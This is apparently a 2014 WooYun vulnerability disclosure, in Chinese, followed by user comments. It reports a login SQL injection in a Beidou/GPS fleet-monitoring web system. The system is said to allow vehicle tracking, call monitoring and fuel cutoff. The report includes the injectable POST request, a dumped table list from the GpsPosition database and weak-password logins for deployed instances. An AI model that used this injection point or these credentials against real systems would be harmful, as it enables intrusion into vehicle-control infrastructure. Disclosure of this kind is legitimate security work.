疑似某北斗全球定位系统存在登录SQl注入(车辆行程监控/电话监听/关闭油路)

案例通过百度仅找到两个,看到是兵工部门,感觉使用范围会比较广只是没有被引擎收录，故按照通用软件提交的。涉及网站:

**.**.**.**:8081/webgis/login.aspx
 **.**.**.**/webgis/login.aspx [中途程序错误,无法访问,已正常]

（一）

查看元素显示如下,根据后来的搜索判断,应该为和北京航天智科信息科技公司有关（http://**.**.**.**/）

<td style="background-image: url(images/bottom.gif); background-color:Transparent; height: 42px; text-align: left;
         padding-left: 20px; color: yellow;">
         版权：中国兵工物资总公司北斗/GPS研究中心<br />
         电话：(010)51260561&nbsp; &nbsp; 51260571
     </td>
     </tr></table>

（二）登录点的POST-SQl注射:

<---界面图

**.**.**.**/webgis/login.aspx (POST)
 
 __VIEWSTATE=/wEPDwUKMjAxODg5ODg5M2RkpN1wjnGnlXSk0maUaSmU/Bi0OEU%3D&__VIEWSTATEGENERATOR=20EB5FCD&__EVENTVALIDATION=/wEWCQKmn53SDgLI75rvDALsz7brCgLsz7brCgLsz7brCgLyj/OQAgLAr6WkDALcgYLKCwKM54rGBov%2BPlpi0O06FXhWIWV3ALFfNgF4&hd=0&rbl=&tbUserName=admin&tbPwd=123456&tbValidateNo=d3cf&Button1=

Database: GpsPosition
 [24 tables]
 +--------------------------+
 | A                        |
 | A                        |
 | Announcement             |
 | BroadcastContent         |
 | Circular                 |
 | Companies                |
 | KzStatus                 |
 | MaintenanceRecord        |
 | MonitorUser              |
 | MonitorUserJoinGateway   |
 | MonitorUserMacCollection |
 | OilSet                   |
 | OperationLog             |
 | PermissioA               |
 | InsuranceRecord/x03      |
 | driverinfos/x05          |
 | z1350000!                |
 | devicetype               |
 | dpsMessage               |
 | driverLoginExit          |
 | dtproperties             |
 | interestPoint            |
 | newPosition              |
 | z1                       |
 +--------------------------+

下附帐号登录的信息图，管理员帐号进入显示数十个车队707辆机车:

跑了几个帐号,弱口令:

（三）

**.**.**.**:8081/webgis/ zzt/zzt

**.**.**.**/webgis/ admin/71**

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2014-09-25 12:36

厂商回复：

最新状态：

暂无

1. 2014-09-20 14:04 | ki11y0u ( 普通白帽子 | Rank:140 漏洞数:28 | 好好学习，求带飞 ~~~~~~~~~~~~~~~~~~~~~~...)

   2

   mark

   1# 回复此人

2. 2014-09-20 14:39 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

   0

   刚看完zone就看到这个洞，什么都明了

   2# 回复此人

3. 2014-09-20 14:58 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

   0

   @第四维度 为啥啊？求地址-_-||

   3# 回复此人

4. 2014-09-20 15:51 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

   0

   @袋鼠妈妈 http://zone.wooyun.org/content/16

   4# 回复此人

5. 2014-09-20 16:31 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

   1

   袋鼠妈妈袋鼠妈妈有个袋袋，袋袋就是为了为了保护乖乖

   5# 回复此人

6. 2014-09-20 19:41 | 番茄师傅 ( 普通白帽子 | Rank:354 漏洞数:95 | http://www.tomatoyu.com/)

   0

   前排CCAV

   6# 回复此人

7. 2014-09-20 19:46 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   0

   蓝翔...

   7# 回复此人

8. 2014-09-20 19:47 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   厨师、黑客、挖掘机！

   8# 回复此人

9. 2014-09-20 20:02 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   0

   不会用电脑控制挖掘机炒菜的黑客不算是黑客...

   9# 回复此人

10. 2014-09-20 23:10 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活，亭长放解)

    0

    坐等渣浪无良小编

    10# 回复此人

11. 2014-09-25 13:15 | 小卖部部长 ( 路人 | Rank:24 漏洞数:3 | 别拿部长不当干部！)

    0

    擦，高科技啊~~~007里的场面啊。。。还TM是国产的！

    11# 回复此人

12. 2014-12-19 15:20 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

    1

    电话监听，关闭油路。

    12# 回复此人

13. 2014-12-19 21:34 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)

    1

    @雷锋 那么得去蓝翔和新东方两大学院进修

    13# 回复此人